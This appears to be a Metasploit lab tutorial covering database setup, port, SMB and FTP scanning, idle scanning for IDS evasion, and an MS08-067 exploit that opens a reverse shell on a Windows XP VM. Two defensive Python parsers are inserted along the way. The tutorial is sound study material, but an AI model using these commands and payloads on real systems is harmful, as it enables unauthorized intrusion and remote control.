Information Security (old version)/Work in progress    2016. 1. 24. 11:37
02. Scanning and attacking with the Metasploit tool
- A tool made up of information gathering, exploits, and the plugins (payloads) the exploits deliver
- External modules such as vulnerability checks and port scanners can be used, and their results can be stored in a DB
- Information-gathering and exploit modules can be used with little setup
- External (Linux) commands can be run from inside msfconsole
- Attack tools that are normally run from Linux can be run from Metasploit so that their results are saved
1. Connecting the Metasploit DB
# /etc/init.d/postgresql start    start PostgreSQL
# su postgres    switch to the DB administrator account
$ createuser msf1 -P    create a DB account and set its password (to delete it later: $ dropuser msf1)
password: msf1
$ createdb --owner=msf1 msf1_db    create the user's database
$ exit    return to the original account
# msfconsole    launch the Metasploit console
msf> help    Metasploit command help
msf> db_status    check the DB connection status
msf> db_connect msf1:password@localhost:5432/msf1_db    connect to the DB
- Modules that have been used once remain, so they are faster the next time they are used
- To disconnect, use the 'db_disconnect' command
msf> db_status
msf> search scanner
msf> use scanner_name
msf> back
msf> exit
[Note] Meaning of module Rank (the author's rule of thumb: success : failure ratio when gathering information)
Rank       Success : Failure
----       -----------------
normal     50 : 50
great      70 : 30
excellent  90 : 10
2. Difference between external and internal commands in MSF
Ex1) External commands can be used, but their results are not saved to the DB
msf > nmap -sS 172.16.4.254 -v
[*] exec: nmap -sS 172.16.4.254 -v
Ex2) Running msf's internal nmap command; the results are saved to the DB
msf> db_nmap -sS -A -p 8080 172.16.4.254
(no "[*] exec:" line is printed for db_nmap)
msf> help
msf > hosts    show the hosts recorded in the DB
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
172.16.4.254 Linux server
msf > services    show the recorded service state for the target
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
172.16.4.254 8080 tcp http-proxy filtered
3. Metasploit terminology
- Exploit: a way of abusing a vulnerability in a system, application, server, etc., e.g. SQL injection, buffer overflow
- Payload: the code to be executed on the system, delivered by the framework (e.g. malicious code)
- Shellcode: the set of instructions used in the payload when the attack is carried out
- Module: a unit of software used within the Metasploit framework
4. Scanning with msf
Ex1) Idle scanning
- A scanning method used to evade IDS/IPS
- Finds, among powered-on systems, one that is not communicating (generating no packets)
- Can be combined with IP spoofing
msf > search scanner    returns a long list
msf > search ipidseq    returns only the 'ipidseq' entry
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/ip/ipidseq normal IPID Sequence Scanner
msf > use auxiliary/scanner/ip/ipidseq
msf auxiliary(ipidseq) > help
msf auxiliary(ipidseq) > help show
msf auxiliary(ipidseq) > show options
Module options (auxiliary/scanner/ip/ipidseq):
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface    interface to use
RHOSTS yes The target address range or CIDR identifier    target subnet or IP address
RPORT 80 yes The target port    target port
SNAPLEN 65535 yes The number of bytes to capture    amount of data to capture (in bytes)
THREADS 1 yes The number of concurrent threads    speed; a lower number is slower
TIMEOUT 500 yes The reply read timeout in milliseconds    reply timeout (lowering it is recommended)
- no: optional (but it must be set to restrict the scan to one interface; leave it unset to use all interfaces)
- yes: a value must be set
THREADS: when there are many targets, a higher value is recommended
- Windows THREADS: 16 (setting it above 16 makes almost no difference to the results)
- Linux THREADS: can be set high
msf auxiliary(ipidseq) > set RHOSTS 172.16.0.0/16    scan the '172.16.0.0/16' subnet
RHOSTS => 172.16.0.0/16
msf auxiliary(ipidseq) > set RPORT 8080    set the port
RPORT => 8080
msf auxiliary(ipidseq) > set THREADS 50    set the thread count
THREADS => 50
(to clear a setting: unset RHOSTS)
msf auxiliary(ipidseq) > show options
Module options (auxiliary/scanner/ip/ipidseq):
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface
RHOSTS 172.16.0.0/16 yes The target address range or CIDR identifier
RPORT 8080 yes The target port
SNAPLEN 65535 yes The number of bytes to capture
THREADS 50 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds
msf auxiliary(ipidseq) > run    execute
[*] 172.16.0.1's IPID sequence class : Incremental!    target that is not communicating (chosen as the IP address to spoof)
[*] 172.16.0.50's IPID sequence class : Incremental!
[*] 172.16.0.51's IPID sequence class : Unknown    powered-off target
~ output omitted ~
msf auxiliary(ipidseq) > db_nmap -p 8080 -Pn -sI 172.16.0.50 172.16.4.254
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-24 11:46 KST
[*] Nmap: Idle scan using zombie 172.16.0.50 (172.16.0.50:80); Class: Incremental
[*] Nmap: Nmap scan report for 172.16.4.254
[*] Nmap: Host is up (0.19s latency).
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 8080/tcp open http-proxy
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 92.54 seconds
- -Pn: used so that the attacker's real IP address is not revealed (it skips the host-discovery probes, which would be sent from the real address)
msf auxiliary(ipidseq) > back
msf >
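The ipidseq classes above rest on one property: a host whose IPID rises by a small fixed step on every packet is predictable, which is exactly what makes it usable as an idle-scan zombie, and the host-side fix is a randomized IPID. The Python below is added here as an example and is not the module's or Nmap's code: it gives a simplified version of that classification plus a parser for the module's result lines, so a defender can list which of their own hosts came back Incremental and remediate them. The thresholds MAX_STEP and RANDOM_MIN_STEP and the sample output lines are this example's own choices.

```python
import re
from typing import Dict, Iterable, List

# Simplified IPID sequence classifier, modelled on the classes the ipidseq
# module and Nmap report ("All zeros", "Incremental", "Random", ...).
# The thresholds are this example's own choices, not the module's.
MAX_STEP = 5            # largest per-probe increment still counted as incremental
RANDOM_MIN_STEP = 1000  # every step larger than this is treated as randomized


def _byteswap16(value: int) -> int:
    """Swap the two bytes of a 16-bit IPID (stacks that count in the wrong byte order)."""
    return ((value & 0xFF) << 8) | ((value >> 8) & 0xFF)


def _steps(ipids: List[int]) -> List[int]:
    """Per-probe increments, modulo 2^16 so a wrap from 65535 to 0 still counts as +1."""
    return [(b - a) % 65536 for a, b in zip(ipids, ipids[1:])]


def classify_ipid_sequence(ipids: List[int]) -> str:
    """Classify the IPIDs observed in consecutive replies from one host."""
    if len(ipids) < 3:
        return "Unknown"                       # too few samples to say anything
    if all(v == 0 for v in ipids):
        return "All zeros"                     # host never sets the IPID field
    steps = _steps(ipids)
    if all(1 <= s <= MAX_STEP for s in steps):
        return "Incremental"                   # predictable: usable as a zombie
    swapped = [_byteswap16(v) for v in ipids]
    if all(1 <= s <= MAX_STEP for s in _steps(swapped)):
        return "Broken little-endian incremental"   # predictable after byte swap
    if all(s == 0 for s in steps):
        return "Constant"
    if all(s > RANDOM_MIN_STEP for s in steps):
        return "Random"                        # what a hardened stack should show
    return "Unknown"


# Matches the module's result lines, e.g.
# "[*] 172.16.0.1's IPID sequence class : Incremental!"
_RESULT_LINE = re.compile(r"^\[\*\]\s+(\S+)'s IPID sequence class\s*:\s*([^!]+)!?\s*$")


def parse_ipidseq_output(lines: Iterable[str]) -> Dict[str, str]:
    """Map each host in the module's output to its reported class (without the '!')."""
    classes: Dict[str, str] = {}
    for line in lines:
        m = _RESULT_LINE.match(line.strip())
        if m:
            classes[m.group(1)] = m.group(2).strip()
    return classes


def predictable_hosts(lines: Iterable[str]) -> List[str]:
    """Hosts a defender should fix: those reported as (any kind of) Incremental."""
    classes = parse_ipidseq_output(lines)
    return sorted(h for h, c in classes.items() if "ncremental" in c)


# Constructed sample in the module's output format (same hosts as the session above).
SAMPLE_OUTPUT = [
    "[*] 172.16.0.1's IPID sequence class : Incremental!",
    "[*] 172.16.0.50's IPID sequence class : Incremental!",
    "[*] 172.16.0.51's IPID sequence class : Unknown",
]

if __name__ == "__main__":
    for host in predictable_hosts(SAMPLE_OUTPUT):
        print(f"{host}: predictable IPID, enable IPID randomization or patch the stack")
    print(classify_ipid_sequence([65534, 65535, 0, 1]))   # wrap-around is still incremental
```

Feeding the classifier IPIDs captured from your own hosts (for example from a packet capture of replies to a few probes) tells you whether any of them would be reported as Incremental by this module before someone else finds out.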
Ex2) SYN scan
- A scanning method that checks the port status of the target
- Cannot gather as wide a range of information as nmap
msf > search portscan
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/wordpress_pingback_access normal Wordpress Pingback Locator
auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal TCP Port Scanner
auxiliary/scanner/portscan/xmas normal TCP "XMas" Port Scanner
auxiliary/scanner/sap/sap_router_portscanner normal SAPRouter Port Scanner
msf > use scanner/portscan/syn
msf auxiliary(syn) > show options
Module options (auxiliary/scanner/portscan/syn):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
INTERFACE no The name of the interface
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds
msf auxiliary(syn) > set PORTS 1-80
PORTS => 1-80
msf auxiliary(syn) > set RHOSTS 172.16.4.254
RHOSTS => 172.16.4.254
msf auxiliary(syn) > set TEREADS 16
TEREADS => 16
msf auxiliary(syn) > show options
Module options (auxiliary/scanner/portscan/syn):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
INTERFACE no The name of the interface
PORTS 1-80 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 172.16.4.254 yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds
msf auxiliary(syn) > run
msf auxiliary(syn) > back
Ex3) SMB scan
- A scanning method that uses Windows NetBIOS
msf > search smb_version
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/smb/smb_version normal SMB Version Detection
msf > use scanner/smb/smb_version
msf auxiliary(smb_version) >
msf auxiliary(smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf auxiliary(smb_version) > set RHOSTS 172.16.4.0/24
RHOSTS => 172.16.4.0/24
msf auxiliary(smb_version) > set THREADS 16
THREADS => 16
msf auxiliary(smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.16.4.0/24 yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 16 yes The number of concurrent threads
msf auxiliary(smb_version) > run
[*] 172.16.4.11:445 is running Windows 7 Enterprise SP1 (build:7601) (name:KJW-PC) (domain:WORKGROUP)
[*] 172.16.4.10:445 is running Windows 7 Ultimate SP1 (build:7601) (name:KJW-PC) (domain:WORKGROUP)
[*] 172.16.4.12:445 is running Windows 7 Enterprise SP1 (build:7601) (name:KJW-PC) (domain:WORKGROUP)
[*] 172.16.4.3:445 is running Windows 7 Ultimate SP1 (build:7601) (name:KJW-PC) (domain:WORKGROUP)
[*] 172.16.4.18:445 is running Windows 7 Ultimate SP1 (build:7601) (name:KJW-PC) (domain:WORKGROUP)
[*] 172.16.4.23:445 is running Windows 7 Enterprise SP1 (build:7601) (name:KJWJ-PC) (domain:WORKGROUP)
[*] 172.16.4.22:445 is running Windows 7 Enterprise SP1 (build:7601) (name:KJW-PC) (domain:WORKGROUP)
[*] Scanned 26 of 256 hosts (10% complete)
[*] Scanned 56 of 256 hosts (21% complete)
[*] Scanned 79 of 256 hosts (30% complete)
[*] Scanned 110 of 256 hosts (42% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 155 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 207 of 256 hosts (80% complete)
[*] Scanned 240 of 256 hosts (93% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_version) >
msf auxiliary(smb_version) > back
msf >
Ex4) FTP scan
- A method for scanning FTP servers
msf > search ftp_version
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/ftp/ftp_version normal FTP Version Scanner
msf > use scanner/ftp/ftp_version
msf auxiliary(ftp_version) > show options
Module options (auxiliary/scanner/ftp/ftp_version):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOSTS yes The target address range or CIDR identifier
RPORT 21 yes The target port
THREADS 1 yes The number of concurrent threads
msf auxiliary(ftp_version) > set RHOSTS 172.16.4.0/24
RHOSTS => 172.16.4.0/24
msf auxiliary(ftp_version) > set THREADS 50
THREADS => 50
msf auxiliary(ftp_version) > show options
Module options (auxiliary/scanner/ftp/ftp_version):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOSTS 172.16.4.0/24 yes The target address range or CIDR identifier
RPORT 21 yes The target port
THREADS 50 yes The number of concurrent threads
msf auxiliary(ftp_version) > run
[*] Scanned 32 of 256 hosts (12% complete)
[*] Scanned 70 of 256 hosts (27% complete)
[*] Scanned 92 of 256 hosts (35% complete)
[*] Scanned 112 of 256 hosts (43% complete)
[*] Scanned 139 of 256 hosts (54% complete)
[*] Scanned 157 of 256 hosts (61% complete)
[*] Scanned 200 of 256 hosts (78% complete)
[*] Scanned 214 of 256 hosts (83% complete)
[*] Scanned 243 of 256 hosts (94% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftp_version) > back
msf >
5. Exploit Tools
- Find a vulnerability -> carry out the attack
- Attacker: Kali Linux (192.168.10.134)
- Target: Win XP (192.168.10.135) -> click the play button on the FTP server
Ex1) Run db_nmap scans
msf > db_nmap -sS -p 1-500 192.168.10.135
msf > db_nmap -sS -Pn -A -p 1-500 192.168.10.135
msf > db_nmap -sS -Pn -p 1-500 --script=smb-check-vulns 192.168.10.135
msf > db_nmap -sS -p 1-500 192.168.10.135
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-24 14:29 KST
[*] Nmap: Nmap scan report for 192.168.10.135
[*] Nmap: Host is up (0.0011s latency).
[*] Nmap: Not shown: 493 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 21/tcp open ftp
[*] Nmap: 25/tcp open smtp
[*] Nmap: 80/tcp open http
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 443/tcp open https
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:AB:E2:7A (VMware)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 1.55 seconds
msf > db_nmap -sS -Pn -A -p 1-500 192.168.10.135
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-24 14:25 KST
[*] Nmap: Nmap scan report for 192.168.10.135
[*] Nmap: Host is up (0.00042s latency).
[*] Nmap: Not shown: 493 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp EasyFTP Server ftpd
[*] Nmap: | ftp-anon: Anonymous FTP login allowed (FTP code 230)
[*] Nmap: | drw-rw-rw- 1 user group 0 Jan 24 12:02 . [NSE: writeable]
[*] Nmap: |_drw-rw-rw- 1 user group 0 Jan 24 12:02 .. [NSE: writeable]
[*] Nmap: |_ftp-bounce: no banner
[*] Nmap: 25/tcp open smtp Microsoft ESMTP 6.0.2600.5512
[*] Nmap: | smtp-commands: with-15b28b4cfd Hello [192.168.10.134], SIZE 2097152, PIPELINING, DSN,
ENHANCEDSTATUSCODES, 8bitmime, BINARYMIME, CHUNKING, VRFY, OK,
[*] Nmap: |_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL
QUIT HELP AUTH BDAT VRFY
[*] Nmap: 80/tcp open http Microsoft IIS httpd 5.1
[*] Nmap: |_http-methods: No Allow or Public header in OPTIONS response (status code 404)
[*] Nmap: |_http-server-header: Microsoft-IIS/5.1
[*] Nmap: |_http-title: Site Not Found
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn
[*] Nmap: 443/tcp open https?
[*] Nmap: | http-cisco-anyconnect:
[*] Nmap: |_ ERROR: Not a Cisco ASA or unsupported version
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:AB:E2:7A (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp::sp3
[*] Nmap: OS details: Microsoft Windows XP SP3
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: with-15b28b4cfd; OSs: Windows, Windows 98, Windows XP; CPE:
cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_xp
[*] Nmap: Host script results:
[*] Nmap: | ms-sql-info:
[*] Nmap: | \\192.168.10.135\pipe\sql\query:
[*] Nmap: | Version:
[*] Nmap: | name: Microsoft SQL Server 2000 RTM
[*] Nmap: | number: 8.00.194.00
[*] Nmap: | Product: Microsoft SQL Server 2000
[*] Nmap: | Service pack level: RTM
[*] Nmap: | Post-SP patches applied: false
[*] Nmap: |_ Named pipe: \\192.168.10.135\pipe\sql\query
[*] Nmap: |_nbstat: NetBIOS name: WITH-15B28B4CFD, NetBIOS user: <unknown>, NetBIOS MAC:
00:0c:29:ab:e2:7a (VMware)
[*] Nmap: | smb-os-discovery:
[*] Nmap: | OS: Windows XP (Windows 2000 LAN Manager)
[*] Nmap: | OS CPE: cpe:/o:microsoft:windows_xp::-
[*] Nmap: | Computer name: with-15b28b4cfd
[*] Nmap: | NetBIOS computer name: WITH-15B28B4CFD
[*] Nmap: | Workgroup: WORKGROUP
[*] Nmap: |_ System time: 2016-01-24T14:26:02+09:00
[*] Nmap: | smb-security-mode:
[*] Nmap: | account_used: guest
[*] Nmap: | authentication_level: user
[*] Nmap: | challenge_response: supported
[*] Nmap: |_ message_signing: disabled (dangerous, but default)
[*] Nmap: |_smbv2-enabled: Server doesn't support SMBv2 protocol
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT ADDRESS
[*] Nmap: 1 0.42 ms 192.168.10.135
[*] Nmap: OS and Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 26.68 seconds
msf > db_nmap -sS -Pn -p 1-500 --script=smb-check-vulns 192.168.10.135
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-24 14:26 KST
[*] Nmap: Nmap scan report for 192.168.10.135
[*] Nmap: Host is up (0.00090s latency).
[*] Nmap: Not shown: 493 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 21/tcp open ftp
[*] Nmap: 25/tcp open smtp
[*] Nmap: 80/tcp open http
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 443/tcp open https
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:AB:E2:7A (VMware)
[*] Nmap: Host script results:
[*] Nmap: | smb-check-vulns:
[*] Nmap: | MS08-067: CHECK DISABLED (add '--script-args=unsafe=1' to run)
(vulnerable and exploitable; does not work on Windows 6 and later)
[*] Nmap: | Conficker: Likely CLEAN
[*] Nmap: | regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
(vulnerable)
[*] Nmap: | SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
(vulnerable)
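The reason to prefer db_nmap over plain nmap (section 2) is that the results are stored rather than scrolled past. The Python below, added here as an example and not part of this page or of Metasploit, parses the `[*] Nmap:` lines into a structured host report and pulls out the weak settings the scans above surfaced (anonymous FTP login allowed, SMB message signing disabled, vulnerability checks that were never run), which is the list a defender hands to the system owner. The sample lines, the 192.0.2.10 address and the service names in them are constructed for the example.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, Iterable, List

PREFIX = "[*] Nmap:"                                   # msfconsole's prefix on every nmap line
SCAN_REPORT_RE = re.compile(r"^Nmap scan report for (\S+)")
# "21/tcp open ftp EasyFTP Server ftpd" -> port, proto, state, service, optional version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


@dataclass
class HostReport:
    address: str = ""
    ports: List[Dict[str, object]] = field(default_factory=list)
    findings: List[str] = field(default_factory=list)


def _strip_prefix(raw: str) -> str:
    """Drop the '[*] Nmap:' prefix; wrapped continuation lines carry none."""
    line = raw.strip()
    return line[len(PREFIX):].strip() if line.startswith(PREFIX) else line


def _script_text(line: str) -> str:
    """Remove the '| ' / '|_' tree decoration that NSE script output uses."""
    return line.lstrip("|_ ").strip()


def parse_db_nmap_output(lines: Iterable[str]) -> HostReport:
    """Build a report for a single-host db_nmap run: ports plus weak-setting findings."""
    report = HostReport()
    for raw in lines:
        line = _strip_prefix(raw)
        m = SCAN_REPORT_RE.match(line)
        if m:
            report.address = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m:
            report.ports.append({
                "port": int(m.group(1)), "proto": m.group(2),
                "state": m.group(3), "service": m.group(4),
                "version": (m.group(5) or "").strip(),
            })
            continue
        text = _script_text(line)
        if text.startswith("ftp-anon:") and "Anonymous FTP login allowed" in text:
            report.findings.append("anonymous FTP login allowed")
        elif text.startswith("message_signing:") and "disabled" in text:
            report.findings.append("SMB message signing disabled")
        elif "CHECK DISABLED" in text:
            # smb-check-vulns skipped this check; the host's exposure is still unknown
            name = text.split(":")[0]
            report.findings.append(f"{name}: vulnerability check not run (needs unsafe=1)")
    return report


def open_ports(report: HostReport) -> List[int]:
    return sorted(p["port"] for p in report.ports if p["state"] == "open")


# Constructed sample in db_nmap's output format (not a real scan; TEST-NET address).
SAMPLE_DB_NMAP = [
    "[*] Nmap: Starting Nmap ( https://nmap.org )",
    "[*] Nmap: Nmap scan report for 192.0.2.10",
    "[*] Nmap: Host is up (0.0010s latency).",
    "[*] Nmap: Not shown: 497 closed ports",
    "[*] Nmap: PORT STATE SERVICE VERSION",
    "[*] Nmap: 21/tcp open ftp ExampleFTP ftpd",
    "[*] Nmap: | ftp-anon: Anonymous FTP login allowed (FTP code 230)",
    "[*] Nmap: |_ftp-bounce: no banner",
    "[*] Nmap: 80/tcp open http ExampleHTTP 1.0",
    "[*] Nmap: 445/tcp open microsoft-ds",
    "[*] Nmap: Host script results:",
    "[*] Nmap: | smb-security-mode:",
    "[*] Nmap: |_ message_signing: disabled (dangerous, but default)",
    "[*] Nmap: | smb-check-vulns:",
    "[*] Nmap: | MS08-067: CHECK DISABLED (add '--script-args=unsafe=1' to run)",
]

if __name__ == "__main__":
    rep = parse_db_nmap_output(SAMPLE_DB_NMAP)
    print(rep.address, "open ports:", open_ports(rep))
    for f in rep.findings:
        print(" -", f)
```

Running it on a saved msfconsole log (for example one captured with `spool`) gives the same findings without re-scanning, and the findings list is what the scan is really for: anonymous write access on FTP and unsigned SMB are the two conditions the later steps of this page depend on.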
Ex2) Finding an exploit module (Payload: windows/shell/reverse_tcp)
msf > search ms08-067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service
Relative Path Stack Corruption
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP
Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP
Inline
generic/tight_loop normal Generic x86 Tight Loop
~ output omitted ~
Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp normal Windows Command Shell, Reverse
TCP Stager
windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse
All-Port TCP Stager
windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse
TCP Stager (DNS)
windows/shell/reverse_tcp_rc4 normal Windows Command Shell, Reverse
TCP Stager (RC4 Stage Encryption)
windows/shell/reverse_tcp_uuid normal Windows Command Shell, Reverse
TCP Stager with UUID Support
windows/shell_bind_tcp normal
- A 'shell' payload is used to get in directly, without an intermediate interface
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal
4 Windows XP SP2 English (AlwaysOn NX)
5 Windows XP SP2 English (NX)
~ output omitted ~
47 Windows XP SP3 Korean (NX)
msf exploit(ms08_067_netapi) > set LHOST 192.168.10.134
LHOST => 192.168.10.134
msf exploit(ms08_067_netapi) > set LPORT 8080
LPORT => 8080
msf exploit(ms08_067_netapi) > set RHOST 192.168.10.135
RHOST => 192.168.10.135
msf exploit(ms08_067_netapi) > set target 47
target => 47
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.10.135 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST 192.168.10.134 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
47 Windows XP SP3 Korean (NX)
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.10.134:8080
[*] Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.10.135
[*] Command shell session 1 opened (192.168.10.134:8080 -> 192.168.10.135:1078) at 2016-01-24
15:19:10 +0900
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter 로컬 영역 연결:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.10.135
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.10.2
C:\WINDOWS\system32>
C:\WINDOWS\system32>^C (ctrl+c)
Abort session 1? [y/N] y
[*] 192.168.10.135 - Command shell session 1 closed. Reason: User exit
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > back
msf >
- When the exploit runs, you are dropped straight into the target system's command prompt.
- Because the session was obtained through a BOF-type attack, the command prompt is buggy and some commands cannot be used.
Ex3) Finding an exploit module (Payload: meterpreter/reverse_tcp)
msf > search ms08-067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service
Relative Path Stack Corruption
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.10.135 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST 192.168.10.134 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
47 Windows XP SP3 Korean (NX)
msf exploit(ms08_067_netapi) > unset PAYLOAD
Unsetting PAYLOAD...
msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
~ output omitted ~
windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective
Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective
Injection), Reverse All-Port TCP Stager
